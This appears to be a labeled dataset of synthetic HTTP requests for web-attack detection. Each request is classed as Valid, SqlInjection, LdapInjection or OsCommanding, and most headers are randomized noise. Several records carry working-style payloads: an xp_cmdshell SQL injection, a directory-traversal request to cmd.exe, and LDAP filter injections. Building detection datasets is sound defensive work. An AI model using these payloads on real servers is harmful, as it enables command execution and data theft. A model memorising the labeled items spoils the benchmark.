If-None-Match: "@RiV@pS8p0_fbPJM09-"
If-Range: *
Max-Forwards: 40
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: tshs Axeteu=gear
Authorization: Basic dXl3dEJhdDM6dHRuaG4=
Range: 7-,1-2,575-73
Referer: /reamtteD/vi3o/ofvcagja.php3
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 6.6; ar-ra; rv:5.6.6) Gecko/98968853
UA-CPU: 68000
UA-Disp: 0205,052,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 765x642
Via: HTTP/9.5 www.mimrt.jpg
Transfer-Encoding: gzip
Upgrade: 2nos5s/7.0
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 48.85.205.201
X-Serial-Number: 54263
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10010
Start - Id: 29943
class: Valid
GET /jJGBiR1YH.b-./3_e1bN5FE1_KAXn3qw/AKsRVBchilddocumentiT/utaMIyie.mdb?isriwea=1HntocpierEcik HTTP/1.1
Host: 180.213.54.9
Connection: keep-alive
Accept: text/*
Accept-Charset: windows-1254, x-mac-arabic, iso-8859-6, big5;q=0.7, iso-8859-15;q=0.0
Accept-Encoding: 
Accept-Language: 7-rjnPUi1;q=0.0, t-auIfpae, uaSt4aee-eOqt;q=0.2
Cache-Control: no-store
Client-ip: 168.214.124.2
Cookie: naon=a1lib])9ornehc[so;tsrhnupt=nullwnull r|dadminndm-aiMtp
Cookie2: $Version="061"
Date: Tue, 16 Nov 04 01:54:57 GMT
ETag: "nppFvQZJOsbgkujKBs"
Expect: 100-continue
From: halico@utnN5.gov
If-Modified-Since: Tue, 27 Jul 04 21:57:29 UTC
If-Unmodified-Since: Sat, 07 Feb 09 14:21:27 CET
If-Match: *
If-None-Match: "NovkCzIYP96HEGf16Lic"
If-Range: Thu, 10 Jun 04 12:44:12 CET
Max-Forwards: 113
MIME-Version: 2.3
Pragma: iwE=eamieat
Proxy-Authorization: Basic emZvRUU6bWhkY2k=
Authorization: gleC dmege=aeeedHgc
Range: 054604-5
Referer: http://www.rf3Ra.fr/8iAews4R/hsefstun/vtAgtE/nrdulbo8/op8terco.conf
TE: trailers
Trailer: Host
User-Agent: Mozilla/7.1 (X11; U; Linux i386 9.4; i6-3n; rv:6.8.0) Gecko/98473418
UA-CPU: MIPS
UA-Disp: 5197,782,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4455x5564
Via: HTTP/6.4 174.127.126.96
Transfer-Encoding: compress
Upgrade: onb4/4.3, rcs/3.8, osine/7.9
Warning: 223 www.9aerce.css "ssaeelsoIRoEt2" "Thu, 01 Apr 04 19:48:08 GMT"
X-Forwarded-For: 43.204.198.183
X-Serial-Number: 75469110788
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 29943
Start - Id: 25384
class: Valid
GET /hx6i/iQDu/x.UFz1MhVeKC4/brctnantsgieQtmeie/ilhke6NahrhomRvra/XiTRGGOU6/sD3y.swf? HTTP/1.1
Host: www.nbt4d.net
Connection: xtlo
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 99.191.189.189
Cookie: osOhortejgns=7668675;rzaiheoot1i=ndMtdtinrhzb~window.opendba
Cookie2: $Version="4"
Date: Sun, 22 Jan 06 05:43:21 CET
ETag: W/"Z2pOfs9CyNAb1oA"
Expect: 100-continue
From: rrhs@lfj0yeitrn.cz
If-Modified-Since: Sat, 07 Jan 06 20:33:54 UTC
If-Unmodified-Since: Sat, 05 Mar 05 09:41:36 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Mar 05 22:15:38 GMT
Max-Forwards: 73
MIME-Version: 3.1
Pragma: 94aO=tec4t
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: 4sqf aniiUpy=aaxti4r
Range: 047-,776-
Referer: /nrlp/reoerte5/syab0t.php
TE: trailers,trailers
Trailer: Upgrade
User-Agent: sosbtrnletinee
UA-CPU: 68000
UA-Disp: 071,871,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 894x439
Via: FTP/4.9 126.161.32.140:5696
Transfer-Encoding: gzip
Upgrade: mAfhy/1.2, miweeu/5.9, cro/2.3, escale/8.3
Warning: 361 189.181.68.53 "fIjyiokT66aez" "Tue, 06 Apr 10 13:42:10 UTC"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 927015568705209514
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25384
Start - Id: 5572
class: Valid
POST /5gYwu7frGsz/aerelT/aTA_scriptcxQePm9Df/kFatngsseCbeeaxesh6/mp9Ec2Eaehyeo/pqiMQfAf_I4/qhBHJpuOXCG/nn/o7/eK4l/1Yl9Af3.LvPksPa.shtml? HTTP/1.1
Content-Length: 334
Content-Language: opr5i,sztR
Content-Encoding: gzip
Content-Location: http://www.eout6ra6.com/i1ountah/Eie4e/7atdih/7aoemn.jsp
Content-MD5: c3JpdW9uNmllbWFtaHRoMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Nov 05 13:23:32 GMT
Last-Modified: Fri, 25 Jun 04 02:51:46 UTC
Host: 27.166.9.242
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 191.224.243.87
Cookie: eeotoip5=lij68vhr4eniclFs;hery1wtme=Ao;ThsbolaarPgG0c=19000
Cookie2: $Version="811"
Date: Wed, 22 Dec 04 18:08:11 CET
ETag: "Qmut.ACnB-6iZ7xSVgG"
Expect: 100-continue
From: ddE5mq0u@tano2i.be
If-Modified-Since: Sat, 13 May 06 21:19:05 CET
If-Unmodified-Since: Tue, 16 Dec 08 24:22:03 UTC
If-Match: "jHHQIaeTPiBQTqs"
If-None-Match: *
If-Range: Fri, 16 Nov 07 23:46:22 GMT
Max-Forwards: 1
MIME-Version: 8.0
Pragma: 1=Tsiese0
Proxy-Authorization: Digest qop=mtRe1ec
Authorization: NTLM ZTR0RnJic211YWVidGdsc2hpbmNoZHVraXJvN2lPZ2FydU51dA==
Range: -97243,-59
Referer: /hfon/d8nl.pdf
TE: deflate
Trailer: Referer
User-Agent: Mozilla/2.3 (X11; U; Open BSD i586 7.7; n4-tW; rv:3.7.0) Gecko/62241040
UA-CPU: x86
UA-Disp: 266,600,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6340x801
Via: 4.9 205.41.102.25, iiH/5.9 www.euht.jpeg
Transfer-Encoding: gzip
Upgrade: aCrv/3.2, uNt/4.1, agThej/0.7
Warning: 189 www.tsXitt6.gif "8U5tatshea" 
X-Forwarded-For: 26.9.191.248
X-Serial-Number: 07654558799930280172
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

nirT1dsosmccisj=ugeftydt tnt3yhest&1isgmdbllr=Atei&pRni2X=Sn&2rohocrgna&e8aogOmlfsoonie=7OEd&efnniss=auis& i;bQTi=+n|&yt=dsycmbaSPfPCin&terlsh= &upSes=r9vsrVb&Tojsinl0yEopmJ=omrro0uadorm>ytschild+var&lns18nleo=4588&Ytttrcnbak=ftscriptin&ihTmfwstaqunh=eoe&dhTolatpMoeeteE=mrx6nps&atdu=ohomegdo&tteeythmdbtrjtA=esrxollcu

End - Id: 5572
Start - Id: 3637
class: Valid
GET /4psNbxtt/XLTDT0_aRH-ICjI/syOpyh76D3A/2nLac7e/d5fwn8rbETtucttee.exe? HTTP/1.0
Host: www.6ote96Lirv.biz
Connection: inteoi
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.1
Accept-Encoding: 
Accept-Language: ithaa9-riio
Cache-Control: no-transform
Client-ip: 247.34.126.105
Cookie: ic2eaA=hlogmwhereautoexecued-txt;s8mNmh=rtb;r2u=oatohehsvtouauuzc;lBlikevTdocumentiJy=o\ec9&r@me8t2Y?otelnet;peieexno0ftiur=|;scauyneoiwstvfj=1372691685
Cookie2: $Version="387"
Date: Tue, 13 Jun 06 11:01:59 UTC
ETag: "kKa@X1stg9PBNpTOZ"
Expect: ttbs=Iammcyan;ehvTg=Btegrha
From: iaeitS7@hsAh8.fr
If-Modified-Since: Tue, 29 Mar 05 06:17:44 GMT
If-Unmodified-Since: Thu, 04 Aug 05 07:06:20 UTC
If-Match: "YxEjM_WnltN3wmcsImXO"
If-None-Match: *
If-Range: "IXqCAb07a9RW9Koo-tO"
Max-Forwards: 067
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="nde1rea"
Authorization: NTLM cmFpZmhmbW8wYW9lYWFybzhzZXVFZ2UyaGllZU5ndHRlaVlN
Range: -66041,943-,-24
Referer: /rrBnlsa/EsEiew.php
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: telodmttx (r_.VHC9tV; pxy36U; rkfoHKR_; mmieL1u; ilw@NYrqI)
UA-CPU: Sparc
UA-Disp: 8239,236,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 767x775
Via: 4.7 www.8gthhOed.js, 5.6 41.35.178.154:84266, 9.5 44.196.123.108
Transfer-Encoding: compress
Upgrade: decg/1.7
Warning: 743 www.dejhzUo.png "iisl" 
X-Forwarded-For: 153.114.223.45
X-Serial-Number: 02989198199377
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3637
Start - Id: 41057
class: SqlInjection
GET /stTDssorrdesis8ciuHa/ZypAPyCwxml8wetc6tbin/n9ios6n1vt7csymorrr/STZ_vW/zB9passthruG6A0Zbody/dl/bhzde9caes8spsst/CG.png?EthgdrzIShm=exec++++xp_cmdshell+%27%22htwaNS%22+%3E%3E++++script.vbs%27&er4olmtla=0473637&onx=54647&eZpG.exdg=cehraentg4s&eaydth=8%24%28%28&Cxkiv_T@pr=aa HTTP/1.1
Host: www.9s56Nan.be
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: koi8-r;q=0.5, hz-gb-2312;q=0.6, euc-tw;q=0.6
Accept-Encoding: deflate;q=0.9, identity;q=0.1, compress;q=0.7, gzip, gzip;q=0.9
Accept-Language: easnrrw-eumafq, Ae-rutAc1
Cache-Control: max-stale=6146
Client-ip: 228.4.149.91
Cookie: Aconnectd9a=2oon;ldsirLsoz=andai
Cookie2: $Version="07"
Date: Sun, 05 Aug 07 18:30:19 CET
ETag: "ZF70eBKRZsZqsOka"
Expect: anoat
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Fri, 12 Feb 10 19:13:18 CET
If-Unmodified-Since: Tue, 03 Aug 04 23:35:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Apr 07 21:30:31 CET
Max-Forwards: 2787
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Digest username="lrrcr8"
Range: 7-04,570-
Referer: http://xpt6osoe.it/i7aou/niig/uAtua/sv4u.wmn
TE: trailers,deflate,trailers
User-Agent: aJQTBrdwz http://www.Ieab.gov
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x915
Via: 8.6 www.ddkFoEs.css
Transfer-Encoding: identity
Upgrade: 8y7ca/4.0, ennao/2.4, eme/1.0
Warning: 017 52.60.55.208:98691 "i7tTft" "Fri, 16 Jul 04 17:18:26 UTC"
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41057
Start - Id: 29630
class: Valid
GET /lFElcxwQFBSxp_ls2/z@o6IK6z0O9.mdb? HTTP/1.1
Host: 147.52.134.249
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: FecBao-se4h, ss-tiug;q=0.8
Cache-Control: only-if-cached
Client-ip: 180.238.202.202
Cookie: vIDQeLvar7@s=Yg=
Cookie2: $Version="789"
Date: Sun, 30 Mar 08 08:36:46 GMT
ETag: W/"WfcVdJogqJO_Z3D"
Expect: sehcwzii=ankses;fciann=et9url
From: i0nn7ig@Eswni6ll.st
If-Modified-Since: Fri, 24 Sep 04 23:48:45 CET
If-Unmodified-Since: Sat, 18 Nov 06 06:11:09 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 31 Aug 06 03:21:31 CET
Max-Forwards: 358
MIME-Version: 0.3
Pragma: 7an='j'
Proxy-Authorization: Digest username="zohhys"
Authorization: NTLM bjNxRXN2bGJ5Yk5yZWFoZW81czVhbWdsZXpwdG91c3Rz
Range: -146,1-593943,-3282
Referer: http://www.9F2m2bg.biz/eitzV/dEpcgF/oukldaoo/dtrte.swf
TE: trailers,gzip
Trailer: TE
User-Agent: t95Lz5cJZ http://www.i6tta.be
UA-CPU: MIPS
UA-Disp: 488,829,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 423x5834
Via: lcu/1.5 242.222.179.46
Transfer-Encoding: compress
Upgrade: tdet/1.8, gtr/7.8, l8sivs/5.8, aedub/5.6, a2nlas/3.5
Warning: 004 www.lttNle.js "sNddrzLnaatnboiu" "Fri, 15 Sep 06 02:58:37 UTC"
X-Forwarded-For: 193.139.126.154
X-Serial-Number: 41855
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29630
Start - Id: 16524
class: Valid
GET /golw/t5ny07L4bzxpuc@.sWp./tl9fjq5/bz1MoPbIM/gF.8PftBXPkah/isnN4aLQo6W.U4FSgMR.nsf?divIqteC3I94=3l8%25tel5ct&gnldIm0ehod=3896&yiEhosefnmhc=ftpmrfrombgsoundwxtermRa&c9ryer9kd=s02q&CVpassthruxyJAu=psn&oienBo1=bxtKh-NMjI%40&sgl4stod9=5&bD8andAc7@all-=e-b9pq%40%40b&tSahee4toS=e%3Coa HTTP/1.1
Host: www.ntdm9.uk
Connection: close
Accept: application/x-tar, text/*;q=0.6
Accept-Charset: x-mac-chinesetrad;q=0.0, x-mac-icelandic, x-mac-korean;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: 3rnte-iy;q=0.5, Tw-uEpe3nea;q=0.4
Cache-Control: no-store
Client-ip: 32.51.86.160
Cookie: wetite=9
Cookie2: $Version="064"
Date: Sat, 27 Dec 08 12:07:01 CET
ETag: "XKmq@WJYA@xAp1Vkg"
Expect: Et2Sof
From: a3hb@rjzaoeAala.com
If-Modified-Since: Wed, 30 Dec 09 07:11:45 CET
If-Unmodified-Since: Mon, 11 Jun 07 09:28:46 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 21 Oct 05 15:22:30 GMT
Max-Forwards: 34
MIME-Version: 0.5
Pragma: whfa=aKtd
Proxy-Authorization: OeomE lOouinza=iyto
Authorization: Digest opaque="sne3hhi"
Range: 6-18279,-9207,2-
Referer: http://www.asejatgn.biz/cywaA/khqEier.doc
TE: chunked
Trailer: Accept-Charset
User-Agent: Mozilla/6.7 (compatible; MSIE 4.8; Linux i586; bymp)
UA-CPU: StrongARM
UA-Disp: 439,238,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 599x133
Via: 5.0 58.159.6.220:918
Transfer-Encoding: compress
Upgrade: lwl/7.6, pratqs/7.3
Warning: 376 www.ycezutrm.jpg "nens" "Mon, 03 Mar 08 23:13:28 GMT"
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 05592727151
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16524
Start - Id: 1847
class: Valid
GET /qtigpedb/@O6d/u011@rKSspjQ4H/oubfnsokt/6-riR/eBSozDFFkO2URY5N/GMZZbCG9WeY/emmilTaarNodrrsovaoB/eNWBkTfrAnoPY.css?ledll=e6xI8uQY&Erreaoarasioni=seeor&egRa=orerecy&andw=t4ZhW4Je.ui&ft=hFY6DvTGF&Mnds6onpt=g+d%25E&0gNhw1wignc2=n3eY9hxgoRsd&ncfn=3605 HTTP/1.1
Host: www.tsillhttn.st:80
Connection: keep-alive
Accept: application/postscript;q=0.0
Accept-Charset: euc-cn;q=0.5, x-mac-cyrillic;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: i=gtoua9h
Client-ip: 184.74.63.88
Cookie: A2oRdfreeajie=200
Cookie2: $Version="44"
Date: Tue, 27 May 08 11:14:21 CET
ETag: "Ax-jm_fdfddxcb-a"
Expect: 100-continue
From: nentele8@rc6nelreEt.be
If-Modified-Since: Sun, 06 Sep 09 17:11:08 CET
If-Unmodified-Since: Sun, 09 May 04 13:41:18 CET
If-Match: *
If-None-Match: "Vt@iEtRZKQKr2Xn"
If-Range: Tue, 28 Nov 06 11:22:04 UTC
Max-Forwards: 982
MIME-Version: 9.5
Pragma: ein6ks1d='lteTri'
Proxy-Authorization: NTLM aHV0blRvZXBhRXVxZmw0Z3MxUGVodG82Z3lldnRlb2FvY3MxOGlnbG9nbQ==
Authorization: NTLM aWl3ZnJhanRub2xndG1raDBFUmVpdXI1aWVobmFUYWl6dA==
Range: -34624,61390-055,75119-
Referer: http://www.3hlecame.org/tnmzont/hitd5ed/iAoxt/bdnhi.sh
TE: chunked,trailers,trailers
Trailer: Range
User-Agent: oneWd (hB0urid; tM7UaUa; wPv0O7mt1m; eqRB9G3Ztn; oQ8S8Y5q)
UA-CPU: x86
UA-Disp: 131,0628,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 870x566
Via: HTTP/0.0 www.lliu.css
Transfer-Encoding: deflate
Upgrade: hNhon/3.1, otosd/5.7, geys/5.0, rhg/7.2
Warning: 891 118.182.25.94 "epdstea40lccSt7xiAtm" "Tue, 07 Sep 04 24:57:56 UTC"
X-Forwarded-For: 22.125.3.165
X-Serial-Number: 64954855399337418
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1847
Start - Id: 38918
class: LdapInjection
GET /rDs_/imcY5J@gFf49lLNf1H/eF5Ltc/ifswrtEapgoof/cUKIFnUWI0M.msf?mQpassthruYRu=eYXpJ&rdo9a=eSx125shb6&h0tdxsaslo=w70h&KnsjVebi=7159405&nhefalt=kopxglH+atRha&1cnrsu3od=TlworawtatIrassied&rt98wiymemrm=25&passwdNVUnullrl_perlo=+nmeltelnet%5Bec&oLa=rl&tLnL3shsefax5te=t0r&edcoiahinIao5=fdr6H%3Dhavinghmkaxse&heebsio=+oi%2Fnyo&enr6ssieq=%29%28++++%7C%28+cn%3D*o%27brien*++++%29%28mail+%3D*o+%27brien*++%29+++ HTTP/1.1
Host: www.3Nawee.be
Connection: close
Accept: */*
Accept-Charset: us-ascii
Accept-Encoding: identity;q=0.9
Accept-Language: *
Cache-Control: min-fresh=90431
Client-ip: 200.72.166.1
Cookie: eQarnncweoo=tztnlogvslhssdSy;tT=276886
Cookie2: $Version="45"
Date: Fri, 13 May 05 16:22:12 GMT
ETag: "Qun6rhfH2clVNXQ16O"
Expect: 100-continue
From: g0ftcpby@2esla.fr
If-Modified-Since: Fri, 22 Feb 08 17:29:51 GMT
If-Unmodified-Since: Wed, 18 Jan 06 21:07:27 GMT
If-Match: *
If-None-Match: "mxpBaSZlNMBvj9Xhe8h@"
If-Range: Thu, 05 Mar 09 18:06:42 CET
Max-Forwards: 8
MIME-Version: 7.2
Pragma: v=uoE
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: ni6tio ogto9ix=ashae
Range: -80225,-8,-43269
Referer: http://tea1oAef.ch/twwahao/obSrAEt/eHtgeo/xtnAa.doc
TE: trailers
Trailer: Pragma
User-Agent: a.9Jjk http://www.Neyttra0.uk
UA-Disp: 518,9521,8
UA-OS: Windows 98
UA-Pixels: 1628x672
Via: 6.7 113.233.112.39:36875, FTP/1.4 www.fcercqe.css
Transfer-Encoding: gzip
Upgrade: ktd/9.4, ytmtr/3.4, aSi3/3.1
Warning: 695 www.5pter.js "oYstrefhsreaowhenept" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38918
Start - Id: 15184
class: Valid
GET /1csbVqTwD8x/vpetcOit/kssnctmfhaaoosr/elzBUP1oVfwIbBLYp5/tteodee4rnGdG81nhaa/@OV/tra1ehrtssreaybnp/DCbetween4.css?E0=elWttrsytfeirwyig&eluugw=acotIfrmne1k&une4Tlh=84&nahe0mhsesP0=tla&5J7gLnoXlocation58=+qwwe&cosrrvgawe=jesriflyiena&7aaszmHeynree=utbgbzrEnhwso&oeoq=ysn2L&C1su=437973&srfpai3V=j3uc HTTP/1.0
Host: 191.69.21.0
Connection: close
Accept: image/*, application/postscript
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 207.13.17.145
Cookie: 618Luaohhhrdd=optfromi$@aiechosewfe9Dnn;cni2h=0
Cookie2: $Version="45"
Date: Wed, 07 Apr 10 18:49:22 CET
ETag: W/"bk2jeoA94xu4PM.x0VY"
Expect: 100-continue
From: hhshpbs@mnyd.cz
If-Modified-Since: Fri, 21 Dec 07 01:20:49 UTC
If-Unmodified-Since: Tue, 06 Sep 05 24:56:50 CET
If-Match: "sTaW1ktxMFb-jrLbfUj"
If-None-Match: "-l1AoOMRN4RklJL@cfH_"
If-Range: *
Max-Forwards: 2
MIME-Version: 7.8
Pragma: ee8=Yy
Proxy-Authorization: Basic ekswYTpsSHJlYXJo
Authorization: Digest nonce
Range: 478892-,53727-
Referer: /6aAeeiv.asmx
TE: gzip
Trailer: Proxy-Authorization
User-Agent: nEntb/9.8.3.5.5
UA-CPU: x86
UA-Disp: 5093,9820,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1443x630
Via: 1.4 94.195.189.236, FTP/3.9 114.244.112.95
Transfer-Encoding: compress
Upgrade: 7jpt9/1.4, who/8.3, alnadh/2.9, eAa/5.4, imc/9.8
Warning: 672 146.81.253.52 "jtadl" "Mon, 09 Feb 04 19:26:43 CET"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 656353
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 15184
Start - Id: 2235
class: Valid
GET /N.gSx/snEzsta1Elxrdbu/tssHeo.mspx?Qft9bt=rcy1%5C&kfwrbWo=bey&me=pTcfresw&tSeae=+Eedexecieb%5D HTTP/1.0
Host: 111.86.184.111
Connection: close
Accept: text/plain, audio/*;q=0.0
Accept-Charset: iso-8859-4, windows-1250, x-mac-ce, iso-8859-6, x-mac-japanese;q=0.2
Accept-Encoding: 
Accept-Language: n-oaabm;q=0.4, medncu-hnw, ne-si9er
Cache-Control: no-store
Client-ip: 124.21.115.181
Cookie: vpse=/~EavEni2;eblo=lu;3u7V=tfWfX;ekhsb=7;ftocr=922903;muerSdtadnoeira=sr18EaUL-XP
Cookie2: $Version="1"
Date: Sat, 27 Aug 05 07:52:01 GMT
ETag: "gWs73jwL-gVA35XahV"
Expect: tl7fd7ks=7t8pl4eo;uOtar=eexe
From: tnaDi@steaaaE.be
If-Modified-Since: Tue, 11 Jul 06 12:05:57 CET
If-Unmodified-Since: Mon, 09 Mar 09 11:36:28 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 27 Jun 07 04:54:33 GMT
Max-Forwards: 381
MIME-Version: 7.3
Pragma: t=aaiiogib
Proxy-Authorization: Digest response="4216772A5CecEFaA8c9aAfE01bB8C2cc"
Authorization: x8pmhE y6Htoaa=lvewyb
Range: -9799,98225-
Referer: /ntbya3e.tar
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.3 (Machintosh; U; PPC 9.9; zt-ix; rv:9.0.0) Gecko/55907896
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3153x522
Via: 4.8 171.231.199.206, 3.2 www.s3qeaihh.png
Transfer-Encoding: gzip
Upgrade: uadh/3.9, esa/6.4
Warning: 986 22.139.28.204 "6desddaxYcZe9" 
X-Forwarded-For: 211.5.1.135
X-Serial-Number: 92243859196
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2235
Start - Id: 43958
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.xomE79.uk
Connection: ejatusal
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.6, deflate;q=0.0
Accept-Language: TAnn-4;q=0.1, L-omnztdid, 5i56xdd-nsm;q=0.5, 2l-E0tsnn5e;q=0.7
Cache-Control: no-cache
Client-ip: 167.244.39.243
Cookie: oisllntse=0;keryv6t=05091
Cookie2: $Version="588"
Date: Tue, 22 Sep 09 22:13:25 GMT
ETag: W/"g.zs56ap96bucj4wI"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Wed, 06 Jun 07 12:18:26 UTC
If-Unmodified-Since: Tue, 26 Sep 06 03:10:26 UTC
If-Match: "NMfv6.p0nsaiyKYqcJ"
If-None-Match: "4Ib8nR.KnYokT6Z@pfKr"
If-Range: Tue, 07 Oct 08 03:31:37 GMT
Max-Forwards: 85
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: Digest realm
Range: 97793-3,500796-0
Referer: http://dehwsnf.st/ansts.php3
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/1.2 (Windows; U; WinNT 3.1; gd-i9; rv:1.8.8) Gecko/72624859
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4200x926
Via: FTP/9.5 139.75.116.233:62858, 0.9 www.s1nbh4.tiff, HTTP/8.5 www.hiitani.jpg
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 43958
Start - Id: 29375
class: Valid
GET /ttH.EoXPKKNURmP/ViframeZ8Mi/syTeectrutl5xtesa.png? HTTP/1.1
Host: 78.151.253.54
Connection: jia8
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=1505
Client-ip: 167.36.208.51
Cookie: IWbFnullXSselectJjm=9
Cookie2: $Version="515"
Date: Mon, 08 Mar 10 10:18:10 UTC
ETag: W/"fA3ZKS2Ci0QFLw9dz13"
Expect: 100-continue
From: Snuhnht@r9nesdIkt.it
If-Modified-Since: Mon, 29 Nov 04 11:20:34 CET
If-Unmodified-Since: Fri, 24 Apr 09 14:49:57 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Aug 05 03:31:54 CET
Max-Forwards: 0889
MIME-Version: 3.6
Pragma: c=8blsen
Proxy-Authorization: jYqi3 eItsacn=9a9eiess
Authorization: Digest cnonce="eMsat"
Range: 60-931,-49,8-736
Referer: http://i5ie.ch/e30adio/mznuv/1mtsttr/tedrEnev/ueUaqyt.php3
TE: trailers,chunked,deflate
Trailer: Accept-Charset
User-Agent: ixJ4.oJ http://www.00al5h.biz
UA-CPU: StrongARM
UA-Disp: 468,4853,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 183x157
Via: HTTP/1.0 0.24.75.12, 6.0 65.110.151.57
Transfer-Encoding: gzip
Upgrade: iaepj/3.1
Warning: 447 169.93.32.223 "aIpcxkf8sawnqanmjire" "Tue, 19 Aug 08 09:49:59 UTC"
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 725402
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29375
Start - Id: 38422
class: LdapInjection
GET /oyrvgTRk1imh.shtml?we8=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&eettamtfc6e=n_O5&xiuYseiw51=Linnodet+eeReimgt%25taom&oaliict6u=l9eht&heT3Ftds5lnetpo=a8plyf2V%40%40IX&iUrbluoshcn=2t&xtheeM=odidunni1&Ruriiynnse=184&Hr-uOCdeletePZ9a=tbe&gdNtO3=nodetwp-s53de5d&abttt=gi8a&icerrRh=rhP5&Efa=218651&vpO=160206 HTTP/1.0
Host: 109.62.33.43
Connection: close
Accept: image/png;q=0.4, application/rtf;q=0.4, image/*;q=0.4
Accept-Charset: iso-8859-7;q=0.0, windows-1254, x-mac-ce, iso-8859-3;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 169.13.143.24
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="88"
Date: Mon, 12 Jan 09 12:31:22 GMT
ETag: W/"Nuh8aaig2MhWGggs"
Expect: w7lal
From: r8urdpH@atna.uk
If-Modified-Since: Fri, 31 Jul 09 23:37:31 CET
If-Unmodified-Since: Thu, 17 Jun 04 10:28:18 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Sep 08 11:03:48 GMT
Max-Forwards: 4
MIME-Version: 2.2
Pragma: l=Eee
Proxy-Authorization: Digest cnonce="twseli3"
